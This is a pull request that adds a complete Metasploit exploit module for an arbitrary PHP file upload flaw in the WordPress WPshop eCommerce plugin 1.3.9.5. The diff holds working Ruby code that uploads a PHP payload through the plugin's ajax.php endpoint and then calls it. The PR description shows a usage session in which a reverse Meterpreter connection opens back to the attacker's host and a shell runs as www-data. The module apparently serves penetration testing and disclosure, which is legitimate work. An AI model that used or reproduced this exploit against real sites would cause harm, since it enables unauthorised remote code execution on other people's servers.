### PR TITLE
Add WordPress WPshop eCommerce File Upload.

### DIFF
--- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress WPshop eCommerce Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress WPshop eCommerce plugin,
+        version 1.3.9.5. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'g0blin', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['WPVDB', '7830'],
+          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
+      'DisclosureDate' => 'Mar 09 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wpshop', '1.3.9.6')
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(5 + rand(5)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'uri'       => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    )
+
+    if res
+      if res.code == 200 && res.body =~ /#{php_pagename}/
+        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        register_files_for_cleanup(php_pagename)
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'ERROR')
+    end
+
+    print_status("#{peer} - Calling payload...")
+    send_request_cgi(
+      'uri'       => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
+    )
+  end
+end

--- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
         fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
     else
-      fail_with(Failure::Unknown, 'ERROR')
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end
 
     print_status("#{peer} - Calling payload...")

--- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res
       if res.code == 200 && res.body =~ /#{php_pagename}/
-        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        print_good("#{peer} - Our payload is at: #{php_pagename}.")
         register_files_for_cleanup(php_pagename)
       else
         fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")


### PR DESCRIPTION
#### Add Wordpress WPshop eCommerce File Upload Vulnerability.

  Application: Wordpress Plugin 'WPshop eCommerce' 1.3.9.5
  Homepage: https://wordpress.org/plugins/wpshop/
  Source Code: https://downloads.wordpress.org/plugin/wpshop.1.3.9.5.zip
  Active Installs: 1,000+
  References: https://wpvulndb.com/vulnerabilities/7830
#### Vulnerable packages*

  1.3.9.5
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_wpshop_ecommerce_file_upload 
msf exploit(wp_wpshop_ecommerce_file_upload) > show options 

Module options (exploit/unix/webapp/wp_wpshop_ecommerce_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WPshop eCommerce 1.3.9.5


msf exploit(wp_wpshop_ecommerce_file_upload) > info

       Name: Wordpress WPshop eCommerce Upload Vulnerability
     Module: exploit/unix/webapp/wp_wpshop_ecommerce_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-03-09

Provided by:
  g0blin
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   WPshop eCommerce 1.3.9.5

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  WPshop eCommerce plugin, version 1.3.9.5. The vulnerability allows 
  for arbitrary file upload and remote code execution.

References:
  https://wpvulndb.com/vulnerabilities/7830
  https://research.g0blin.co.uk/g0blin-00036/

msf exploit(wp_wpshop_ecommerce_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_wpshop_ecommerce_file_upload) > check 
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_wpshop_ecommerce_file_upload) > exploit 

[*] Started reverse handler on 192.168.1.37:4444 
[+] 192.168.1.31:80 - Our payload is at: jKjs.php.
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 2 opened (192.168.1.37:4444 -> 192.168.1.31:51030) at 2015-04-24 06:16:12 -0300
[+] Deleted jKjs.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 2240 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
